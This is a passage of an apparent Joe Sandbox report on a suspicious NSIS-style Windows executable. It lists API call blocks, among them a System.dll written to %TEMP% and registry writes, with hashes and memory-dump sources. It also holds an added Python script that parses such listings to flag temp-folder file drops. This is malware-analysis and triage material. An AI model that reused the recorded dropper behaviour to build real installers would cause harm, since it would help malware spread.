                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: "C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                                                  • API String ID: 589700163-3552261379
                                                  • Opcode ID: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
                                                  • Instruction ID: 5b12d47152ff200ae170f947aa1a5954375b24b0904b9d00ef93706c4e891e75
                                                  • Opcode Fuzzy Hash: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
                                                  • Instruction Fuzzy Hash: 1311E61580020295DB303B548C44AB772F8EF95750F42807FED9A732C1E77C5CA286BD
                                                  APIs
                                                  • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp,000000FF,C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00000400,?,?,00000021), ref: 0040252F
                                                  • lstrlenA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,?,?,C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp,000000FF,C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00000400,?,?,00000021), ref: 00402536
                                                  • WriteFile.KERNEL32(00000000,?,C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 00402568
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: ByteCharFileMultiWideWritelstrlen
                                                  • String ID: 8$C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp$C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll
                                                  • API String ID: 1453599865-1177592820
                                                  • Opcode ID: 2ec4215e9db0db2254814e3cb73373e62eff586f0bef32dca1f3cc9ac902e013
                                                  • Instruction ID: a0446c0b0672562d506aa58c1ab7e20caafec20b23fb80a76c6cc5bad6f3e06b
                                                  • Opcode Fuzzy Hash: 2ec4215e9db0db2254814e3cb73373e62eff586f0bef32dca1f3cc9ac902e013
                                                  • Instruction Fuzzy Hash: C0015271A44214FFD700AFB09E8AEAB7278AF51719F20453BB102B61D1D6BC5E419A2D
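The function blocks on this page are raw sandbox output: each block lists its API calls with a `ref:` call-site address, a memory-dump source and a fuzzy hash, but the calls are not in address order (the GlobalFree/GlobalAlloc block above lists the free before the alloc) and nothing ties the file-write blocks together. The script below is an added example for this page, not Joe Sandbox code and not code from the sample; it parses the listing format as it appears here, restores program order by sorting on the `ref` address, and flags blocks that both write a file and carry a path under AppData\Local\Temp in their arguments, which is the shape of the nsh56A9.tmp\System.dll drop listed just above. SAMPLE is a trimmed copy of two blocks from this page; `parse_blocks`, `temp_drops` and `WRITE_APIS` are names of the example's own.

```python
"""Parse Joe Sandbox function-block listings and triage file drops.

Added example for this report page; not sandbox or sample code. SAMPLE below
is a trimmed copy of two blocks from the page; function names are the example's own.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import Iterator, Optional

# One API line of a block, in the three shapes the report uses:
#   • WriteFile.KERNEL32(00000000,?,...,00000011), ref: 00402568
#   • GetTickCount.KERNEL32 ref: 00402D53
#   • Part of subcall function 1000122C: lstrcpynW.KERNEL32(...), ref: 1000123C
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\),)?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)\s*$"
)
KEY_LINE = re.compile(r"^\s*•\s*(Source File|Instruction Fuzzy Hash):\s*(.*)$")

# Calls that put bytes on disk; a %TEMP% path next to one of them is a file drop.
WRITE_APIS = {"WriteFile", "CreateFileW", "CreateFileA", "CopyFileW", "MoveFileW"}
TEMP_MARK = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)


@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]
    ref: int                       # address of the call site
    subcall: Optional[int] = None  # callee address when the call sits in a subfunction


@dataclass
class Block:
    calls: list[ApiCall] = field(default_factory=list)
    source: str = ""
    fuzzy_hash: str = ""

    def call_order(self) -> list[str]:
        """Direct calls in program order; the report does not list them in address order."""
        return [c.api for c in sorted(self.calls, key=lambda c: c.ref) if c.subcall is None]

    def api_set(self) -> set[str]:
        return {c.api for c in self.calls}

    def all_args(self) -> Iterator[str]:
        for c in self.calls:
            yield from c.args


def parse_blocks(text: str) -> list[Block]:
    blocks: list[Block] = []
    cur: Optional[Block] = None
    for line in text.splitlines():
        if line.strip() == "APIs":          # every block opens with this heading
            cur = Block()
            blocks.append(cur)
            continue
        if cur is None:
            continue
        m = API_LINE.match(line)
        if m:
            args = m.group("args")
            cur.calls.append(ApiCall(
                api=m.group("api"), module=m.group("module"),
                args=args.split(",") if args else [],
                ref=int(m.group("ref"), 16),
                subcall=int(m.group("sub"), 16) if m.group("sub") else None))
            continue
        k = KEY_LINE.match(line)
        if k:
            if k.group(1) == "Source File":
                cur.source = k.group(2).strip()
            else:
                cur.fuzzy_hash = k.group(2).strip()
    return blocks


def temp_drops(blocks: list[Block]) -> list[tuple[Block, list[str]]]:
    """Blocks that write a file and name a path under %TEMP% in any argument."""
    hits = []
    for b in blocks:
        paths = {a for a in b.all_args() if TEMP_MARK.search(a)}
        if paths and b.api_set() & WRITE_APIS:
            hits.append((b, sorted(paths)))
    return hits


SAMPLE = r"""
APIs
• WideCharToMultiByte.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp,000000FF,C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00000400,?,?,00000021), ref: 0040252F
• lstrlenA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,?,?,C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp,000000FF,C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00000400,?,?,00000021), ref: 00402536
• WriteFile.KERNEL32(00000000,?,C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 00402568
Memory Dump Source
• Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Instruction Fuzzy Hash: C0015271A44214FFD700AFB09E8AEAB7278AF51719F20453BB102B61D1D6BC5E419A2D
APIs
• GlobalFree.KERNEL32(00000000), ref: 10002416
  • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
• GlobalAlloc.KERNEL32(00000040), ref: 10002397
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
Memory Dump Source
• Source File: 00000004.00000002.1479157136.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
• Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
"""

if __name__ == "__main__":
    for b, paths in temp_drops(parse_blocks(SAMPLE)):
        print(b.source.split(",")[0], "->", b.call_order())
        for p in paths:
            print("   drop path:", p)
```

Run it over the full report text instead of SAMPLE to get every block that drops into %TEMP%, each with its dump source so the block can be located in the downloaded memory image; the sorted `call_order()` is also what to compare when the same fuzzy hash turns up in another sample's report.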
                                                  APIs
                                                  • GetWindowLongW.USER32(?,000000EB), ref: 0040421E
                                                  • GetSysColor.USER32(00000000), ref: 0040423A
                                                  • SetTextColor.GDI32(?,00000000), ref: 00404246
                                                  • SetBkMode.GDI32(?,?), ref: 00404252
                                                  • GetSysColor.USER32(?), ref: 00404265
                                                  • SetBkColor.GDI32(?,?), ref: 00404275
                                                  • DeleteObject.GDI32(?), ref: 0040428F
                                                  • CreateBrushIndirect.GDI32(?), ref: 00404299
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                  • String ID:
                                                  • API String ID: 2320649405-0
                                                  • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                  • Instruction ID: b52404dbcc62fb778985b33cde271554a932a1fc376a4a1675ca0a40f23ca1f0
                                                  • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                  • Instruction Fuzzy Hash: B821A4B1A04704ABCB219F68DD08B4B7BF8AF80700F04896DFD91E22E1C338E804CB65
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
                                                  • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
                                                  • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
                                                  • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                  • String ID:
                                                  • API String ID: 3294113728-0
                                                  • Opcode ID: 175540e7daea46f04fdcb39c2d6b9fb6ccbbe72b81495e9a418fab8b18cc96be
                                                  • Instruction ID: c76d0c3f0677147b44531d70e17f5e21854c5a6159b3e076b4812541e28699f2
                                                  • Opcode Fuzzy Hash: 175540e7daea46f04fdcb39c2d6b9fb6ccbbe72b81495e9a418fab8b18cc96be
                                                  • Instruction Fuzzy Hash: C931BF72C00118BBDF11AFA5CE49DAF7E79EF04324F20423AF510762E1C6796E418BA9
                                                  APIs
                                                  • DestroyWindow.USER32(00000000,00000000), ref: 00402D35
                                                  • GetTickCount.KERNEL32 ref: 00402D53
                                                  • wsprintfW.USER32 ref: 00402D81
                                                    • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                    • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                    • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                    • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll), ref: 0040525F
                                                    • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                    • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                    • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                    • Part of subcall function 00402CFE: MulDiv.KERNEL32(0001E790,00000064,00020B36), ref: 00402D13
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                  • String ID: ... %d%%
                                                  • API String ID: 722711167-2449383134
                                                  • Opcode ID: 005642a4020e0a71c09553eb7eb2d495990d68115b85ca719a2b531c3bc6c152
                                                  • Instruction ID: 6ab1becf65089363c82906b09123353a2bcc309babf83807567d4fce196db36a
                                                  • Opcode Fuzzy Hash: 005642a4020e0a71c09553eb7eb2d495990d68115b85ca719a2b531c3bc6c152
                                                  • Instruction Fuzzy Hash: CD015E31909220EBC7616B64EE5DBDB3A68AB00704B14457BF905B11F1C6B85C45CFAE
                                                  APIs
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404AD7
                                                  • GetMessagePos.USER32 ref: 00404ADF
                                                  • ScreenToClient.USER32(?,?), ref: 00404AF9
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404B0B
                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404B31
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Message$Send$ClientScreen
                                                  • String ID: f
                                                  • API String ID: 41195575-1993550816
                                                  • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                  • Instruction ID: 0eecd9b69481b59551465bcf9db52b38cf56a1a0cd5b93a9aa54e622b558eefa
                                                  • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                  • Instruction Fuzzy Hash: 4B015E71E00219BADB10DBA4DD85FFEBBBCAB94711F10012BBB10B61D0D7B4A9018BA5
                                                  APIs
                                                  • GetDC.USER32(?), ref: 00401D44
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                  • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                  • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                  • CreateFontIndirectW.GDI32(0040BDA0), ref: 00401DBC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                  • String ID: Times New Roman
                                                  • API String ID: 3808545654-927190056
                                                  • Opcode ID: 42daf7e862d24205765a2c482219e26c12b6d25ebfb053d7a945aa5fdfa94cc8
                                                  • Instruction ID: b353f613be9e85a79a94993a8857fa9d5f5277bee054f22ce4286571968d2ed5
                                                  • Opcode Fuzzy Hash: 42daf7e862d24205765a2c482219e26c12b6d25ebfb053d7a945aa5fdfa94cc8
                                                  • Instruction Fuzzy Hash: 4A016D31948285EFEB416BB0AE0AFDABF74EB65305F144479F141B62E2C77810058B6E
                                                  APIs
                                                  • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402C9D
                                                  • wsprintfW.USER32 ref: 00402CD1
                                                  • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                  • API String ID: 1451636040-1158693248
                                                  • Opcode ID: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
                                                  • Instruction ID: 6313022a6a14420ec29aadc91542e870ad3eb66361cb8d6516b6428425dce57e
                                                  • Opcode Fuzzy Hash: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
                                                  • Instruction Fuzzy Hash: 36F01270504108ABEF205F50DD4ABAE3768BB00309F00843AFA16B51D1DBB95959DB59
                                                  APIs
                                                    • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                  • GlobalFree.KERNEL32(?), ref: 10002572
                                                  • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1479157136.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000004.00000002.1479140415.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000004.00000002.1479171762.0000000010003000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000004.00000002.1479188233.0000000010005000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_10000000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc
                                                  • String ID:
                                                  • API String ID: 1780285237-0
                                                  • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                  • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                                  • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                  • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                                  APIs
                                                  • lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A67
                                                  • wsprintfW.USER32 ref: 00404A70
                                                  • SetDlgItemTextW.USER32(?,004226E8), ref: 00404A83
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: ItemTextlstrlenwsprintf
                                                  • String ID: %u.%u%s%s$&B
                                                  • API String ID: 3540041739-2907463167
                                                  • Opcode ID: bc3b7f17ced557010f42f2a5da3d553c1ee365e0fd64efe36082f95fd3b84f34
                                                  • Instruction ID: b2bc00afb158c588b9a06456614f3f49c694bd1d1c2ad39e9d347cd1a0135542
                                                  • Opcode Fuzzy Hash: bc3b7f17ced557010f42f2a5da3d553c1ee365e0fd64efe36082f95fd3b84f34
                                                  • Instruction Fuzzy Hash: 131126737001247BCB10A66D9C45EDF324DDBC5334F144237FA65F60D1D938882186E8
                                                  APIs
                                                  • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                  • lstrlenW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                  • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
